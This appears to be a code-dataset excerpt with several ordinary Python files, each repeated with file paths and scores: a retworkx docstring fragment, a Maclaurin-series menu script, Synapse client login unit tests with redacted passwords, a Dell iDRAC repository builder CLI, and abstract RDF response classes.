be used to ensure any edges added to the graph does not introduce a cycle.
By default the real time cycle checking feature is disabled for
performance, however you can enable it by setting the ``check_cycle``
attribute to True. For example::
import retworkx
dag = retworkx.PyDAG()
dag.check_cycle = True
or at object creation::
import retworkx
dag = retworkx.PyDAG(check_cycle=True)
With check_cycle set to true any calls to :meth:`PyDAG.add_edge` will
ensure that no cycles are added, ensuring that the PyDAG class truly
represents a directed acyclic graph. Do note that this cycle checking on
:meth:`~PyDAG.add_edge`, :meth:`~PyDigraph.add_edges_from`,
:meth:`~PyDAG.add_edges_from_no_data`,
:meth:`~PyDAG.extend_from_edge_list`, and
:meth:`~PyDAG.extend_from_weighted_edge_list` comes with a performance
penalty that grows as the graph does. If you're adding a node and edge at
the same time, leveraging :meth:`PyDAG.add_child` or
:meth:`PyDAG.add_parent` will avoid this overhead.
"""
pass | 0.589716 | 0.66113 |
from dataclasses import dataclass
from math import factorial as f
# pip install prototools
from prototools import Menu, textbox, int_input
N = 10
def sinx(x, n=N):
return sum((-1)**k * x**(2*k + 1) / f(2*k + 1) for k in range(n + 1))
def cosx(x, n=N):
return sum((-1)**k * x**(2*k) / f(2*k) for k in range(n + 1))
def expx(x, n=N):
return sum((x**k) / f(k) for k in range(n + 1))
def arcsenx(x, n=N):
return sum(
(f(2*k) * x**(2*k + 1)) / (4**k * (f(k)**2) * (2*k + 1))
for k in range(n + 1)
)
def _f(f, a, b, n):
if f == arcsenx:
if a < -1 or b > 1:
textbox("Fuera de dominio")
return
h = (abs(a) + abs(b)) / n
t, k = [], a
while k <= b:
t.append(round(k, 2))
k += h
for i in t:
print(f"x: {i:>4} f({i:>4.1f}) -> {f(i):>6.2f}")
@dataclass
class Solution:
a: int = -1
b: int = 1
n: int = 10
def set_a(self, a):
self.a = a
def set_b(self, b):
self.b = b
def set_n(self, n):
self.n = n
def evaluar(self, f):
_f(f, self.a, self.b, self.n)
def main():
sol = Solution()
menu = Menu("Aproximacion de Funciones")
menu.add_options(
("Ingresar el valor de a",
lambda: sol.set_a(int_input("Ingrese el valor de a: "))),
("Ingresar el valor de b",
lambda: sol.set_b(int_input("Ingrese el valor de b: "))),
("Ingresar el valor de n",
lambda: sol.set_n(int_input("Ingrese el valor de n: "))),
("Evaluación de la función exp(x) en la partición",
lambda: sol.evaluar(expx)),
("Evaluación de la función sen(x) en la partición",
lambda: sol.evaluar(sinx)),
("Evaluación de la función cos(x) en la partición",
lambda: sol.evaluar(cosx)),
("Evaluación de la función arcsen(x) en la partición",
lambda: sol.evaluar(arcsenx)),
)
menu.settings(header_bottom=True)
menu.run()
if __name__ == "__main__":
main() | soluciones/aproximacion_series_maclaurin/main.py | from dataclasses import dataclass
from math import factorial as f
# pip install prototools
from prototools import Menu, textbox, int_input
N = 10
def sinx(x, n=N):
return sum((-1)**k * x**(2*k + 1) / f(2*k + 1) for k in range(n + 1))
def cosx(x, n=N):
return sum((-1)**k * x**(2*k) / f(2*k) for k in range(n + 1))
def expx(x, n=N):
return sum((x**k) / f(k) for k in range(n + 1))
def arcsenx(x, n=N):
return sum(
(f(2*k) * x**(2*k + 1)) / (4**k * (f(k)**2) * (2*k + 1))
for k in range(n + 1)
)
def _f(f, a, b, n):
if f == arcsenx:
if a < -1 or b > 1:
textbox("Fuera de dominio")
return
h = (abs(a) + abs(b)) / n
t, k = [], a
while k <= b:
t.append(round(k, 2))
k += h
for i in t:
print(f"x: {i:>4} f({i:>4.1f}) -> {f(i):>6.2f}")
@dataclass
class Solution:
a: int = -1
b: int = 1
n: int = 10
def set_a(self, a):
self.a = a
def set_b(self, b):
self.b = b
def set_n(self, n):
self.n = n
def evaluar(self, f):
_f(f, self.a, self.b, self.n)
def main():
sol = Solution()
menu = Menu("Aproximacion de Funciones")
menu.add_options(
("Ingresar el valor de a",
lambda: sol.set_a(int_input("Ingrese el valor de a: "))),
("Ingresar el valor de b",
lambda: sol.set_b(int_input("Ingrese el valor de b: "))),
("Ingresar el valor de n",
lambda: sol.set_n(int_input("Ingrese el valor de n: "))),
("Evaluación de la función exp(x) en la partición",
lambda: sol.evaluar(expx)),
("Evaluación de la función sen(x) en la partición",
lambda: sol.evaluar(sinx)),
("Evaluación de la función cos(x) en la partición",
lambda: sol.evaluar(cosx)),
("Evaluación de la función arcsen(x) en la partición",
lambda: sol.evaluar(arcsenx)),
)
menu.settings(header_bottom=True)
menu.run()
if __name__ == "__main__":
main() | 0.659186 | 0.414366 |
import base64
import pytest
from unittest.mock import call, Mock, patch
import synapseclient.__main__ as cmdline
from synapseclient.core.exceptions import SynapseAuthenticationError, SynapseNoCredentialsError
import synapseutils
def test_command_sync(syn):
"""Test the sync function.
Since this function only passes argparse arguments for the sync subcommand
straight to `synapseutils.sync.syncToSynapse`, the only tests here are for
the command line arguments provided and that the function is called once.
"""
parser = cmdline.build_parser()
args = parser.parse_args(['sync', '/tmp/foobarbaz.tsv'])
assert args.manifestFile == '/tmp/foobarbaz.tsv'
assert args.dryRun is False
assert args.sendMessages is False
assert args.retries == 4
with patch.object(synapseutils, "syncToSynapse") as mockedSyncToSynapse:
cmdline.sync(args, syn)
mockedSyncToSynapse.assert_called_once_with(syn,
manifestFile=args.manifestFile,
dryRun=args.dryRun,
sendMessages=args.sendMessages,
retries=args.retries)
def test_get_multi_threaded_flag():
"""Test the multi threaded command line flag"""
parser = cmdline.build_parser()
args = parser.parse_args(['get', '--multiThreaded', 'syn123'])
assert args.multiThreaded
# defaults to True
args = parser.parse_args(['get', 'syn123'])
assert args.multiThreaded
@patch('builtins.print')
def test_get_sts_token(mock_print):
"""Test getting an STS token."""
folder_id = 'syn_1'
permission = 'read_write'
syn = Mock()
expected_output = 'export foo=bar'
syn.get_sts_storage_token.return_value = expected_output
parser = cmdline.build_parser()
args = parser.parse_args(['get-sts-token', folder_id, permission, '-o', 'shell'])
cmdline.get_sts_token(args, syn)
syn.get_sts_storage_token.assert_called_with(folder_id, permission, output_format='shell')
mock_print.assert_called_once_with(expected_output)
def test_authenticate_login__success(syn):
"""Verify happy path for _authenticate_login"""
with patch.object(syn, 'login'):
cmdline._authenticate_login(syn, 'foo', 'bar', rememberMe=True, silent=True)
syn.login.assert_called_once_with('foo', 'bar', rememberMe=True, silent=True)
def test_authenticate_login__api_key(syn):
"""Verify attempting to authenticate when supplying an api key as the password.
Should attempt to treat the password as an api key after the initial failure as a password."""
username = 'foo'
password = <PASSWORD>(b'<PASSWORD>')
login_kwargs = {'rememberMe': True}
expected_login_calls = [
call(username, password, **login_kwargs),
call(username, apiKey=password, **login_kwargs)
]
with patch.object(syn, 'login') as login:
login.side_effect = SynapseAuthenticationError()
# simulate failure both as password and as api key
with pytest.raises(SynapseAuthenticationError):
cmdline._authenticate_login(syn, username, password, **login_kwargs)
assert expected_login_calls == login.call_args_list
login.reset_mock()
# now simulate success when used as an api key
def login_side_effect(*args, **kwargs):
if login.call_count == 1:
raise SynapseAuthenticationError()
return
login.side_effect = login_side_effect
cmdline._authenticate_login(syn, username, password, **login_kwargs)
assert expected_login_calls == login.call_args_list
@patch.object(cmdline, '_authenticate_login')
def test_login_with_prompt(mock_authenticate_login, syn):
"""Verify logging in when username/pass supplied as args to the command"""
user = 'foo'
password = '<PASSWORD>'
login_kwargs = {
'rememberMe': False,
'silent': True,
'forced': True,
}
cmdline.login_with_prompt(syn, user, password, **login_kwargs)
mock_authenticate_login.assert_called_once_with(syn, user, password, **login_kwargs)
@patch.object(cmdline, 'getpass')
@patch.object(cmdline, 'input')
@patch.object(cmdline, '_authenticate_login')
def test_login_with_prompt__getpass(mock_authenticate_login, mock_input, mock_getpass, syn):
"""Verify logging in when entering username/pass from the console."""
user = 'foo'
password = '<PASSWORD>'
login_kwargs = {
'rememberMe': False,
'silent': True,
'forced': True,
}
def authenticate_side_effect(*args, **kwargs):
if mock_authenticate_login.call_count == 1:
raise SynapseNoCredentialsError()
return
mock_authenticate_login.side_effect = authenticate_side_effect
mock_input.return_value = user
mock_getpass.getpass.return_value = password
cmdline.login_with_prompt(syn, None, None, **login_kwargs)
mock_input.assert_called_once_with("Synapse username: ")
mock_getpass.getpass.assert_called_once_with(("Password or api key for " + user + ": ").encode('utf-8'))
expected_authenticate_calls = [
call(syn, None, None, **login_kwargs),
call(syn, user, password, **{k: v for k, v in login_kwargs.items() if k != 'silent'})
]
assert expected_authenticate_calls == mock_authenticate_login.call_args_list | tests/unit/synapseclient/unit_test_commandline.py | import base64
import pytest
from unittest.mock import call, Mock, patch
import synapseclient.__main__ as cmdline
from synapseclient.core.exceptions import SynapseAuthenticationError, SynapseNoCredentialsError
import synapseutils
def test_command_sync(syn):
"""Test the sync function.
Since this function only passes argparse arguments for the sync subcommand
straight to `synapseutils.sync.syncToSynapse`, the only tests here are for
the command line arguments provided and that the function is called once.
"""
parser = cmdline.build_parser()
args = parser.parse_args(['sync', '/tmp/foobarbaz.tsv'])
assert args.manifestFile == '/tmp/foobarbaz.tsv'
assert args.dryRun is False
assert args.sendMessages is False
assert args.retries == 4
with patch.object(synapseutils, "syncToSynapse") as mockedSyncToSynapse:
cmdline.sync(args, syn)
mockedSyncToSynapse.assert_called_once_with(syn,
manifestFile=args.manifestFile,
dryRun=args.dryRun,
sendMessages=args.sendMessages,
retries=args.retries)
def test_get_multi_threaded_flag():
"""Test the multi threaded command line flag"""
parser = cmdline.build_parser()
args = parser.parse_args(['get', '--multiThreaded', 'syn123'])
assert args.multiThreaded
# defaults to True
args = parser.parse_args(['get', 'syn123'])
assert args.multiThreaded
@patch('builtins.print')
def test_get_sts_token(mock_print):
"""Test getting an STS token."""
folder_id = 'syn_1'
permission = 'read_write'
syn = Mock()
expected_output = 'export foo=bar'
syn.get_sts_storage_token.return_value = expected_output
parser = cmdline.build_parser()
args = parser.parse_args(['get-sts-token', folder_id, permission, '-o', 'shell'])
cmdline.get_sts_token(args, syn)
syn.get_sts_storage_token.assert_called_with(folder_id, permission, output_format='shell')
mock_print.assert_called_once_with(expected_output)
def test_authenticate_login__success(syn):
"""Verify happy path for _authenticate_login"""
with patch.object(syn, 'login'):
cmdline._authenticate_login(syn, 'foo', 'bar', rememberMe=True, silent=True)
syn.login.assert_called_once_with('foo', 'bar', rememberMe=True, silent=True)
def test_authenticate_login__api_key(syn):
"""Verify attempting to authenticate when supplying an api key as the password.
Should attempt to treat the password as an api key after the initial failure as a password."""
username = 'foo'
password = <PASSWORD>(b'<PASSWORD>')
login_kwargs = {'rememberMe': True}
expected_login_calls = [
call(username, password, **login_kwargs),
call(username, apiKey=password, **login_kwargs)
]
with patch.object(syn, 'login') as login:
login.side_effect = SynapseAuthenticationError()
# simulate failure both as password and as api key
with pytest.raises(SynapseAuthenticationError):
cmdline._authenticate_login(syn, username, password, **login_kwargs)
assert expected_login_calls == login.call_args_list
login.reset_mock()
# now simulate success when used as an api key
def login_side_effect(*args, **kwargs):
if login.call_count == 1:
raise SynapseAuthenticationError()
return
login.side_effect = login_side_effect
cmdline._authenticate_login(syn, username, password, **login_kwargs)
assert expected_login_calls == login.call_args_list
@patch.object(cmdline, '_authenticate_login')
def test_login_with_prompt(mock_authenticate_login, syn):
"""Verify logging in when username/pass supplied as args to the command"""
user = 'foo'
password = '<PASSWORD>'
login_kwargs = {
'rememberMe': False,
'silent': True,
'forced': True,
}
cmdline.login_with_prompt(syn, user, password, **login_kwargs)
mock_authenticate_login.assert_called_once_with(syn, user, password, **login_kwargs)
@patch.object(cmdline, 'getpass')
@patch.object(cmdline, 'input')
@patch.object(cmdline, '_authenticate_login')
def test_login_with_prompt__getpass(mock_authenticate_login, mock_input, mock_getpass, syn):
"""Verify logging in when entering username/pass from the console."""
user = 'foo'
password = '<PASSWORD>'
login_kwargs = {
'rememberMe': False,
'silent': True,
'forced': True,
}
def authenticate_side_effect(*args, **kwargs):
if mock_authenticate_login.call_count == 1:
raise SynapseNoCredentialsError()
return
mock_authenticate_login.side_effect = authenticate_side_effect
mock_input.return_value = user
mock_getpass.getpass.return_value = password
cmdline.login_with_prompt(syn, None, None, **login_kwargs)
mock_input.assert_called_once_with("Synapse username: ")
mock_getpass.getpass.assert_called_once_with(("Password or api key for " + user + ": ").encode('utf-8'))
expected_authenticate_calls = [
call(syn, None, None, **login_kwargs),
call(syn, user, password, **{k: v for k, v in login_kwargs.items() if k != 'silent'})
]
assert expected_authenticate_calls == mock_authenticate_login.call_args_list | 0.562056 | 0.268258 |
from argparse import ArgumentParser
from omsdk.sdkfile import LocalFile
from omsdk.sdkcenum import TypeHelper
from omsdk.catalog.sdkupdatemgr import UpdateManager
from omsdk.catalog.sdkhttpsrc import DownloadProtocolEnum
from omdrivers.helpers.iDRAC.UpdateHelper import UpdateHelper
from omsdk.omlogs.Logger import LogManager, LoggerConfigTypeEnum
import sys
import logging
# LogManager.setup_logging()
logger = logging.getLogger(__name__)
def RepoBuilder(arglist):
parser = ArgumentParser(description='Local Repository Builder')
parser.add_argument('-C', '--catalog',
action="store", dest="catalog", nargs='?',
default='Catalog', type=str,
help="Name of the Catalog file that contains the info about needed DUPs")
parser.add_argument('-f', '--folder',
action="store", dest="folder", type=str,
help="folder from where repository is built")
parser.add_argument('-c', '--components',
action="store", dest="component", nargs='+',
help="components for which the DUPs are requested.")
parser.add_argument('-s', '--site',
action="store", dest="site", type=str, nargs='?',
default='downloads.dell.com',
help="models for which the DUPs are requested.")
parser.add_argument('-p', '--protocol',
action="store", dest="protocol", nargs='?',
default='HTTP', choices=['HTTP', 'FTP', 'NoOp', 'HashCheck'],
help="models for which the DUPs are requested.")
parser.add_argument('-v', '--verbose',
action="store_true", help="verbose mode")
parser.add_argument('-D', '--download-dups',
action="store_true", dest="dld_dups", help="download DUPs")
parser.add_argument('-l', '--download-catalog',
action="store_true", dest="dld_catalog", help="download catalog")
parser.add_argument('-b', '--build-catalog',
action="store_true", dest="build_catalog", help="build catalog")
options = parser.parse_args(arglist)
if not options.component:
options.component = []
if options.folder is None:
print("Folder must be provided")
return -1
if options.verbose is None:
options.verbose = False
if options.verbose:
logging.basicConfig(level=logging.DEBUG)
if not options.dld_dups and not options.build_catalog and \
not options.dld_catalog:
options.dld_catalog = True
options.build_catalog = True
options.dld_dups = True
options.protocol = TypeHelper.convert_to_enum(options.protocol,
DownloadProtocolEnum)
updshare = LocalFile(local=options.folder, isFolder=True)
if not updshare.IsValid:
print("Folder is not writable!")
return -2
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Configuring Update Share...")
UpdateManager.configure(updshare, site=options.site,
protocol=options.protocol)
if options.dld_catalog:
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Updating Catalog from downloads.dell.com...")
UpdateManager.update_catalog()
if options.build_catalog:
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Building Repository Catalog ....")
UpdateHelper.build_repo(options.catalog, True, *options.component)
if options.dld_dups:
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Downloading DUPs ...")
UpdateManager.update_cache(options.catalog)
if __name__ == "__main__":
RepoBuilder(sys.argv[1:]) | omdrivers/helpers/iDRAC/RepoBuilder.py | from argparse import ArgumentParser
from omsdk.sdkfile import LocalFile
from omsdk.sdkcenum import TypeHelper
from omsdk.catalog.sdkupdatemgr import UpdateManager
from omsdk.catalog.sdkhttpsrc import DownloadProtocolEnum
from omdrivers.helpers.iDRAC.UpdateHelper import UpdateHelper
from omsdk.omlogs.Logger import LogManager, LoggerConfigTypeEnum
import sys
import logging
# LogManager.setup_logging()
logger = logging.getLogger(__name__)
def RepoBuilder(arglist):
parser = ArgumentParser(description='Local Repository Builder')
parser.add_argument('-C', '--catalog',
action="store", dest="catalog", nargs='?',
default='Catalog', type=str,
help="Name of the Catalog file that contains the info about needed DUPs")
parser.add_argument('-f', '--folder',
action="store", dest="folder", type=str,
help="folder from where repository is built")
parser.add_argument('-c', '--components',
action="store", dest="component", nargs='+',
help="components for which the DUPs are requested.")
parser.add_argument('-s', '--site',
action="store", dest="site", type=str, nargs='?',
default='downloads.dell.com',
help="models for which the DUPs are requested.")
parser.add_argument('-p', '--protocol',
action="store", dest="protocol", nargs='?',
default='HTTP', choices=['HTTP', 'FTP', 'NoOp', 'HashCheck'],
help="models for which the DUPs are requested.")
parser.add_argument('-v', '--verbose',
action="store_true", help="verbose mode")
parser.add_argument('-D', '--download-dups',
action="store_true", dest="dld_dups", help="download DUPs")
parser.add_argument('-l', '--download-catalog',
action="store_true", dest="dld_catalog", help="download catalog")
parser.add_argument('-b', '--build-catalog',
action="store_true", dest="build_catalog", help="build catalog")
options = parser.parse_args(arglist)
if not options.component:
options.component = []
if options.folder is None:
print("Folder must be provided")
return -1
if options.verbose is None:
options.verbose = False
if options.verbose:
logging.basicConfig(level=logging.DEBUG)
if not options.dld_dups and not options.build_catalog and \
not options.dld_catalog:
options.dld_catalog = True
options.build_catalog = True
options.dld_dups = True
options.protocol = TypeHelper.convert_to_enum(options.protocol,
DownloadProtocolEnum)
updshare = LocalFile(local=options.folder, isFolder=True)
if not updshare.IsValid:
print("Folder is not writable!")
return -2
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Configuring Update Share...")
UpdateManager.configure(updshare, site=options.site,
protocol=options.protocol)
if options.dld_catalog:
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Updating Catalog from downloads.dell.com...")
UpdateManager.update_catalog()
if options.build_catalog:
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Building Repository Catalog ....")
UpdateHelper.build_repo(options.catalog, True, *options.component)
if options.dld_dups:
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Downloading DUPs ...")
UpdateManager.update_cache(options.catalog)
if __name__ == "__main__":
RepoBuilder(sys.argv[1:]) | 0.37319 | 0.065396 |
from datetime import datetime
from typing import List, Optional
from pepper.brain.utils.helper_functions import casefold
class RDFBase(object):
@property
def label(self):
# type: () -> str
raise NotImplementedError()
@property
def offset(self):
# type: () -> slice
raise NotImplementedError()
@property
def confidence(self):
# type: () -> float
raise NotImplementedError()
class Entity(RDFBase):
@property
def id(self):
# type: () -> str
raise NotImplementedError()
@property
def type(self):
# type: () -> str
raise NotImplementedError()
class Predicate(RDFBase):
@property
def cardinality(self):
# type: () -> int
raise NotImplementedError()
class Triple(object):
@property
def subject(self):
# type: () -> Entity
raise NotImplementedError()
@property
def predicate(self):
# type: () -> Predicate
raise NotImplementedError()
@property
def object(self):
# type: () -> Entity
raise NotImplementedError()
def casefold_capsule(capsule, format='triple'):
"""
Function for formatting a capsule into triple format or natural language format
Parameters
----------
capsule:
format
Returns
-------
"""
for k, v in capsule.items():
if isinstance(v, dict):
capsule[k] = casefold_capsule(v, format=format)
else:
capsule[k] = casefold(v, format=format)
return capsule
class CardinalityConflict(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
@property
def object(self):
# type: () -> Entity
raise NotImplementedError()
class NegationConflict(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
@property
def predicate(self):
# type: () -> Predicate
raise NotImplementedError()
class StatementNovelty(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
class EntityNovelty(object):
@property
def object(self):
# type: () -> bool
raise NotImplementedError()
@property
def subject(self):
# type: () -> bool
raise NotImplementedError()
class Gap(object):
@property
def predicate(self):
# type: () -> Predicate
raise NotImplementedError()
@property
def entity(self):
# type: () -> Entity
raise NotImplementedError()
class Gaps(object):
@property
def object(self):
# type: () -> List[Gap]
raise NotImplementedError()
@property
def subject(self):
# type: () -> List[Gap]
raise NotImplementedError()
class Overlap(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
@property
def entity(self):
# type: () -> Entity
raise NotImplementedError()
class Overlaps(object):
@property
def object(self):
# type: () -> List[Overlap]
raise NotImplementedError()
@property
def subject(self):
# type: () -> List[Overlap]
raise NotImplementedError()
class Thoughts(object):
def cardinality_conflicts(self):
# type: () -> List[CardinalityConflict]
raise NotImplementedError()
def negation_conflict(self):
# type: () -> Optional[NegationConflict]
raise NotImplementedError()
def statement_novelties(self):
# type: () -> List[StatementNovelty]
raise NotImplementedError()
def entity_novelty(self):
# type: () -> EntityNovelty
raise NotImplementedError()
def object_gaps(self):
# type: () -> Gaps
raise NotImplementedError()
def subject_gaps(self):
# type: () -> Gaps
raise NotImplementedError()
def overlaps(self):
# type: () -> Overlaps
raise NotImplementedError()
def trust(self):
# type: () -> float
raise NotImplementedError() | pepper/brain/utils/response.py | from datetime import datetime
from typing import List, Optional
from pepper.brain.utils.helper_functions import casefold
class RDFBase(object):
@property
def label(self):
# type: () -> str
raise NotImplementedError()
@property
def offset(self):
# type: () -> slice
raise NotImplementedError()
@property
def confidence(self):
# type: () -> float
raise NotImplementedError()
class Entity(RDFBase):
@property
def id(self):
# type: () -> str
raise NotImplementedError()
@property
def type(self):
# type: () -> str
raise NotImplementedError()
class Predicate(RDFBase):
@property
def cardinality(self):
# type: () -> int
raise NotImplementedError()
class Triple(object):
@property
def subject(self):
# type: () -> Entity
raise NotImplementedError()
@property
def predicate(self):
# type: () -> Predicate
raise NotImplementedError()
@property
def object(self):
# type: () -> Entity
raise NotImplementedError()
def casefold_capsule(capsule, format='triple'):
"""
Function for formatting a capsule into triple format or natural language format
Parameters
----------
capsule:
format
Returns
-------
"""
for k, v in capsule.items():
if isinstance(v, dict):
capsule[k] = casefold_capsule(v, format=format)
else:
capsule[k] = casefold(v, format=format)
return capsule
class CardinalityConflict(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
@property
def object(self):
# type: () -> Entity
raise NotImplementedError()
class NegationConflict(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
@property
def predicate(self):
# type: () -> Predicate
raise NotImplementedError()
class StatementNovelty(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
class EntityNovelty(object):
@property
def object(self):
# type: () -> bool
raise NotImplementedError()
@property
def subject(self):
# type: () -> bool
raise NotImplementedError()
class Gap(object):
@property
def predicate(self):
# type: () -> Predicate
raise NotImplementedError()
@property
def entity(self):
# type: () -> Entity
raise NotImplementedError()
class Gaps(object):
@property
def object(self):
# type: () -> List[Gap]
raise NotImplementedError()
@property
def subject(self):
# type: () -> List[Gap]
raise NotImplementedError()
class Overlap(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
@property
def entity(self):
# type: () -> Entity
raise NotImplementedError()
class Overlaps(object):
@property
def object(self):
# type: () -> List[Overlap]
raise NotImplementedError()
@property
def subject(self):
# type: () -> List[Overlap]
raise NotImplementedError()
class Thoughts(object):
def cardinality_conflicts(self):
# type: () -> List[CardinalityConflict]
raise NotImplementedError()
def negation_conflict(self):
# type: () -> Optional[NegationConflict]
raise NotImplementedError()
def statement_novelties(self):
# type: () -> List[StatementNovelty]
raise NotImplementedError()
def entity_novelty(self):
# type: () -> EntityNovelty
raise NotImplementedError()
def object_gaps(self):
# type: () -> Gaps
raise NotImplementedError()
def subject_gaps(self):
# type: () -> Gaps
raise NotImplementedError()
def overlaps(self):
# type: () -> Overlaps
raise NotImplementedError()
def trust(self):
# type: () -> float
raise NotImplementedError() | 0.897354 | 0.273902 |